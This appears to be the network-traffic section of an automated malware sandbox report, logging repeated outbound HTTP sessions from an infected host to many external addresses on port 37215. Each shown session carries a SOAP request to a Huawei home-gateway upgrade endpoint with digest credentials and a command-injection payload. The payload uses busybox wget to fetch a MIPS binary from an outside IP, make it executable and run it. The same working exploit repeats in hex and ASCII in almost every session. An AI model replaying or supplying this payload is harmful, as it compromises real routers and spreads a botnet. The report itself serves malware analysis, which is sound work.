68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.1439284197.112.240.20637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090953112 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.1448870156.16.175.10137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091074944 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.143452241.146.71.6837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091211081 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.1454734197.153.88.7337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091232061 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192.168.2.145460241.0.201.9337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091258049 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.1444058156.112.241.17837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091284037 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.1451936156.77.138.7937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091306925 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.1434128197.103.12.22437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091344118 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.1455352156.190.186.1737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091365099 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.143404041.161.235.10437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091397047 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.1440620156.109.2.3037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091427088 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
